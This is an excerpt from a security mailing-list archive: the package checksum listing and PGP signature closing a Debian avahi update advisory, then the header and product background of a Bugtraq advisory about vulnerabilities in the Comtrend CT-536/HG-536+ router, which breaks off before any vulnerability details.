  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    27408 68e03f89a0a4ab49d3cf5631d81cefff
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:   131156 4f2d6816ff21fac92409300802b214c8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    50306 95131a6cf96e271bc22b0a58f19d81c8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    51264 b201facb01853a7feb377c476796faed
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    25214 2189bf23f2d2414c95f66de43fa9022e
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    26904 d211581ca51292846f6e41501aab9f35
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    50050 55232395461a750e9589da67c4a6ce59
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    25932 a88e95d1f42acc1824ced261c034a6f8
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    76274 ee627ae2d4ae4675f36be9d773a60933
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    31186 f598856b52c5338d76d08241d5147eba
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    37156 463df874fb4133e30f39efad5ae4c03c
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    22730 db3d21217b9d3a83c9ce61c2dc9088e9
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    42082 710572c240f63df323ea5bc07981be0b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    55348 d759803be1ad6050495a8fcf7796528d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    32504 d70eb6f318769fd7aba37dc9f27ffdd8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    24736 b066f13687d60f3e30a76cc662c0de08
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:   101844 f0d31a9b2bf9491f1b2a11fe5527edd3
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    25078 272eefbb1ebd24fb67392096bc092c91
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    38490 f1cabc135940e9b39eb9e9063023094f

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    59488 9428587d37d42799458cbab9909717f1
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    46170 e0bd94aba8196fda2b280d63512c8766
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    51248 a0e4eae8360a037128e21fb77ae3d4b6
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:   204800 dca516b15da8a9e63fba9126b8e6dd2f
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    38584 cad1047d3aff3e09e48074a4ee00cb04
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    69158 8a70000d6cbde8d4531af98f193b18a3
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    28888 c63485e850a01b0f096c84fcbb8ae1d6
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    26516 f5bffbc708792944bfb04b695bf28920
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    28750 e5981dddc42bf05306495bde1bcb69a0
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    34536 cedfcaa6d06d244ff0fbc59193a964ef
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    98946 130de83abc67d61ae45c83613f7a21dd
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    69900 67c50228144e6f8f1cdb663bf34291b5
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    48296 6d897886473453791d19e8baaa87e1a0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    28854 d35e8426103f6138f856d0a362073096
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    44176 827f2e0285e80ac538f534bb95eb2e98
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:   141590 5e272abfae6ff63932525bd307a1b3ec
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    23558 97a2a8e9885f5d1341220cbd3298dd47
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    26874 56b6a319a4861628a192f60bb14c92e6
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    26324 d11423a1bccc2d7302217303b9d045d2
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    54430 d9c01e729dd9c015ca7f71176c950c06
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    63530 d84b46e225352f225ed88a749a12243c

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    39062 ca723bee9a6e5410e1a735a3f20dcccc
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    76644 7f792c93523d2fa3d21578f9747e5ce1
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:   160222 4a5834dfed0ac7e5def3d15a9dcbef41
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    27150 80ace2ec5158ad7ff73ec24e0d80a4e3
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    30594 a28b044ffa272fd1c75198ee6d85a37d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    32046 685e72415a46c7b3dca6d3c8833644db
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    25428 c19ba84c28c05d92854d0785f4f338dd
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    61688 374affd3c59790335c0fa70232f88072
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    42152 37adabb7dbda1a5570e5d379149b4a07
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    42218 d478292bc207d24282ccd8bbc7a81115
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    27530 f1f278c7db4bad5dddedca04dbf67ff1
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    24966 bf170de01e5bad060977ac7e24aee7c6
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    57638 51df4913d698c32c8a015fb58b42d0c9
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    22890 37ec8d28fdc6a18d394ff95071e7e7dc
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    26280 76dd8d7153a5f6e84fa69a7c3880baf5
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    56598 0c63d9c941a6cce4eab6b2a9684e930b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    40948 9faf3265109106cb065c0fe5aa086642
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    96100 baf54e0411903850a46ba5576271f671
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    55806 df8a81ac560b5f28bf4ea36c4cc1a26e
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    36706 f9961f00521696c9a8ec2b9dc32c8c94
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_mips.deb
    Size/MD5 checksum:    25030 cff1bf92ef2f4effad725b87bd7afc7f

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    27452 396227c19cc0440afcd7f66f520b691c
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    25268 f2da7b0ac786be1f96011d41dd307258
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    22730 3b9a531e735597b77786e78f3a4b7aca
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    54808 67ed267f9612b79298b03ef6a2b8b90d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:   159894 da8f0d29aac2c3b1b50ceeb8b08e1094
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    76540 030f0f208cee6be149e1ef419e14dc0a
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    27000 222c6e0da176aa881af4e1d092219bd3
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    25356 9a92df6f379ca37026a1c39ecd3106ff
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    39546 91c5e1d4470200e09dd82ee382a8633b
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    42914 0b70d2e0f267516636c91ddc0a84a255
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    31714 53cd510e941b185166cda93b6debb541
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    56936 8437ca514d5fb2d1c424f82e693c2679
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    60766 f213054d8dc5925a44e307eaf3ed3a42
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    25832 0234ac09bab571badce2067046fe610a
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    42708 b4b6b84c34ccee1f552501513e29954b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    96710 ddf6b69fe99167a9ca54cfff0435c60b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    36980 4b8ece44a6d39dd1835e045a328fb941
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    32478 1020b0ce7d271f79454d119860771a8e
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    27958 6d56c836c7b15a7d16f843c44b561a5e
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    56822 289eab1fd823ab8984f65d963188b3ad
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_mipsel.deb
    Size/MD5 checksum:    41350 d80e0d1131b242d092b3e9d677828750

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    54320 e0eb45c3939b33c0929529da547ebb12
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    55492 c9e644bdf556e1f1b12bcc32a748eb24
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    26630 2e82a49211a70f33e86d51089018d947
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    59498 8b3528efd6a22b6cbca3878ce62bc704
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    40124 6f6a50b83fc9f5d8aa664389ccc9754d
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    32988 4639ed2c075550cc078b48a5c8033f79
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    25464 8469fe12d78de160635fc01202936d24
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    77110 f85c15c14072e4145e0cc498a0cef903
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    27574 315464e08f3e0e6a4b84d464bc86aadc
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    26882 ee7da4cb60f72d06972eb2522d5f1990
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    43214 06bfe4308c61b9403b07481d8a87eb5e
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    29050 339647e5cb3cb4d2209b0c9a656b2aa8
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    46412 d3236deeea9871c52d51fd8438f79d74
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    53794 e88c2249cc6302bc77c6f993f068a28c
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    22780 3b9a489914ff6c7319f2baa808b4b31f
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    34458 3e73aee93c411e9dbd080d10294a190d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:   103230 1dab76b2cd76cdfaa9a8aa331f46972f
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    42210 6a941389a00270c07cb925bac4b44156
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    26954 a92e1fe219959762796bbcea63879241
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:   151950 934a99c98b0f9c630841f7d4f632e508
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_powerpc.deb
    Size/MD5 checksum:    45712 afcc8e5ac8e7997ce06520468295aa52

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    52806 2159bdeaeefbf1bac017b73749705aff
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:   140994 e162f4553aafa22521400fc71b6e2955
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    40320 41b52cef3da0c2f7860bb6018aaffd4d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    34268 6ed4db82c9244c0c86e8862d1b668ecc
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    25208 3e595d30390d3d8dea75b7687ea01145
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    43310 1983b6a44495718e083fcf04c30b8885
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    59028 7247f2d68bbd11fe458a17902cd4f84a
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    22766 3231740bb2714e9d96bf3f8a818f0b84
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    53398 8f31e87717384601b85a3c020c202375
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    78222 9432a0cb5952f14e5754e255b4548ee6
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    31888 f892cb69987c96a5088fabf12c8db567
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    26336 acfc14090d1069f7895699809008f6ac
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    27144 2f94f5c72bd1709968ed0946fe6dde5e
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    45010 ee4d2bb4fd8c93b3f54339ffa4e483b1
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    26506 af0412f20b0946f6c57703e4fb3141f5
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    43278 bc2e6dc97e61d0f88219a3111de843f3
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    27498 7f2dca3b2590a17977c9621feddd0570
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:   110094 cfc97c2f30cbf1d2092a88edb0b14381
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    43640 9cbc6b8fc97602a76c65ab3cc0d92796
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    25256 cad699f41f1aba87816e9a450e16a439
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_s390.deb
    Size/MD5 checksum:    53646 28867c1506bd6cb673215623799a5221

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    38934 d8d7908b29966e515435647eb6db62fb
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    26350 d09b0fe9e59806ef87fe4cafbe1cf7d5
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    24896 0fc371457328a895d43351e0ef16c2d2
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    42506 72960cd3ba10c89845e6d138e7ed1ad5
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    52418 1e2d174a6983314031395687e0211991
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    52150 dd71f008d3fca5975163a112efaf0704
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    22522 11908fe76ba8e584136571f3f3f6d4cb
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    32536 e92426b7e13a25dcc30f2720d8329707
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    41504 d1eb26b9cd2e5f86213a9a932fc95c18
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    24968 64d2a21a25fbcf4fbfaa4953eb6e917f
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    31398 366c28cc71a4d918c1b3aebfa09d2045
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    74314 b24af46be9313860d40467d15b032942
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    38332 148c8f33a6d54299ab115f28923cd7d1
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:   100272 2b036aaec882cc0ecb09eb3388ea2371
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    40704 9236ea4606deb0830ea766a437587dd8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    57124 c08b1d9692d301b3a31db849c8439e8c
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    27154 51d9fb4f6c91df32124be411f6f61c3b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    25316 bca01b30524301a83c42051b9c31418d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:   139194 42d17949abd45f742a75f0a701287e84
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    51700 f329d6851a0c242992aa99b2c12c3df7
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_sparc.deb
    Size/MD5 checksum:    27302 928c835f4f822b6151af2e0142447e24


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJJTzhSAAoJEL97/wQC1SS+aecH/382jMvurE73swrfBe1COnRV
bbyIiU44e/2kxY8nhnh/R2s2xkXi/p9v2ltLexUInLKoiVttnxMET7cohlZ+XaQy
TehYp3sFphu642elBB5n1kc/+tn3sFvkfwtg6zmD+S29rGx1p7/MQGEZIW8liXPg
oF62I723s5tjYoiItcXMbsjpmSptW0VhtdTZP6ceBWeOheb1JloVs5QNw5V2xbE4
E5JW/8G8tjzqqC3Hy3OyYlg1eFIpJcIg/Jjzdml/rEVANknI2xR70KsmpjOmf3hS
vu8yzMuEIGx/f11TcVobxKz5mplwgeXevc7N6coXCA78DVmREJPGSKv/NkFjOrw�qG
-----END PGP SIGNATURE-----

From - Mon Dec 22 15:39:34 2008
X-Account-Key: account7
X-UIDL: 4909bb8c00005404
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39006-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id C27AAECD70
for <lists@securityspace.com>; Mon, 22 Dec 2008 15:37:39 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 1B95123700F; Mon, 22 Dec 2008 12:50:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9295 invoked from network); 22 Dec 2008 17:53:30 -0000
Message-ID: <494FD97D.7080807@isecauditors.com>
Date: Mon, 22 Dec 2008 19:16:29 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Organization: Internet Security Auditors
User-Agent: Thunderbird 2.0.0.18 (Windows/20081105)
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: [ISecAuditors Security Advisories] Multiple vulnerabilities in WiFi
 router COMTREND CT-536/HG-536+
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Status:   

============================================INTERNET SECURITY AUDITORS ALERT 2007-002
- Original release date: 31st January, 2007
- Last revised: 22th December, 2008
- Discovered by: Daniel Fernandez Bleda
- Severity: 5/5
============================================
I. VULNERABILITY
-------------------------
Multiple vulnerabilities in WiFi router COMTREND CT-536/HG-536+

II. BACKGROUND
-------------------------
The CT-536 is an 802.11g (54Mbps) wireless and wired Local Area
Network (WLAN) ADSL router. Four 10/100 Base-T Ethernet and single USB
ports provide wired LAN connectivity with an integrated 802.11g WiFi
WLAN Access Point (AP) for wireless connectivity. The CT-536 ADSL
router provides state of the art security features such as WPA data
encryption; Firewall, VPN pass through.

